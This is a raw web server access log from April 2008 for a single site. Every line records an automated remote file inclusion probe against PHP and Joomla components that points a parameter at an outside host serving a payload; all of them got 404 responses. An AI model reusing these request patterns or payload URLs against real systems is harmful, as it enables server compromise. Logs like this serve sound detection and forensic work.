217.196.64.12 - - [27/Apr/2008:05:00:30 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://donhunter.co.nz/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
217.196.64.12 - - [27/Apr/2008:05:00:30 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://donhunter.co.nz/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
77.74.195.98 - - [27/Apr/2008:05:00:42 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://donhunter.co.nz/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
77.74.195.98 - - [27/Apr/2008:05:00:42 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://donhunter.co.nz/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
212.203.76.10 - - [27/Apr/2008:05:02:34 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.203.76.10 - - [27/Apr/2008:05:02:34 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.203.76.10 - - [27/Apr/2008:05:02:34 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.61.90 - - [27/Apr/2008:05:02:54 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
67.19.61.90 - - [27/Apr/2008:05:02:55 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
212.227.99.192 - - [27/Apr/2008:05:04:15 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.227.99.192 - - [27/Apr/2008:05:04:20 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.61.90 - - [27/Apr/2008:05:04:47 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
67.19.61.90 - - [27/Apr/2008:05:04:47 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
66.40.12.40 - - [27/Apr/2008:05:05:13 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.40.12.40 - - [27/Apr/2008:05:05:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.40.12.40 - - [27/Apr/2008:05:05:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.127.253.161 - - [27/Apr/2008:05:05:24 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.127.253.161 - - [27/Apr/2008:05:05:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.127.253.161 - - [27/Apr/2008:05:05:25 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:05:31 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:05:31 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:05:31 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:05:31 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.83.225.172 - - [27/Apr/2008:05:05:54 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.83.225.172 - - [27/Apr/2008:05:05:54 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.83.225.172 - - [27/Apr/2008:05:05:54 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.83.225.172 - - [27/Apr/2008:05:05:54 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
198.66.235.206 - - [27/Apr/2008:05:06:45 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
198.66.235.206 - - [27/Apr/2008:05:06:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
198.66.235.206 - - [27/Apr/2008:05:06:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
198.66.235.206 - - [27/Apr/2008:05:06:46 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:11 -0700] "GET /logs/access_080303.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:13 -0700] "GET /logs/access_080303.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:14 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:14 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:15 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [27/Apr/2008:05:07:17 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.61.90 - - [27/Apr/2008:05:08:16 -0700] "GET /logs/access_071022.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:08:24 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:08:25 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:08:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.245.131.190 - - [27/Apr/2008:05:08:38 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.245.131.190 - - [27/Apr/2008:05:08:38 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.245.131.190 - - [27/Apr/2008:05:08:38 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.245.131.190 - - [27/Apr/2008:05:09:11 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:09:17 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.42.133.2 - - [27/Apr/2008:05:10:09 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.42.133.2 - - [27/Apr/2008:05:10:09 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.42.133.2 - - [27/Apr/2008:05:10:10 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.42.133.2 - - [27/Apr/2008:05:10:10 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.106.46.92 - - [27/Apr/2008:05:10:46 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.46.92 - - [27/Apr/2008:05:10:47 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.46.92 - - [27/Apr/2008:05:10:47 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.46.92 - - [27/Apr/2008:05:10:47 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:12:02 -0700] "GET /logs/access_080211.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:12:07 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:12:07 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:12:08 -0700] "GET /logs/access_080225.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:12:39 -0700] "GET /logs/access_071231.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:12:39 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:12:39 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:13:04 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:13:04 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:13:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
93.93.112.23 - - [27/Apr/2008:05:13:05 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
62.75.216.189 - - [27/Apr/2008:05:13:11 -0700] "GET /logs/access.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.8.234.8 - - [27/Apr/2008:05:13:36 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
209.8.234.8 - - [27/Apr/2008:05:13:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
209.8.234.8 - - [27/Apr/2008:05:13:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
209.8.234.8 - - [27/Apr/2008:05:13:36 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:45 -0700] "GET /logs/access_080211.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:45 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:46 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:46 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:46 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
207.210.67.51 - - [27/Apr/2008:05:14:47 -0700] "GET /logs/access_080225.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
85.14.221.111 - - [27/Apr/2008:05:14:48 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.14.221.111 - - [27/Apr/2008:05:14:48 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.14.221.111 - - [27/Apr/2008:05:14:48 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:32 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:32 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:32 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:32 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:36 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
216.97.43.58 - - [27/Apr/2008:05:15:36 -0700] "GET /logs/access_080225.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
65.98.95.186 - - [27/Apr/2008:05:16:11 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:16:40 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:16:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [27/Apr/2008:05:16:41 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
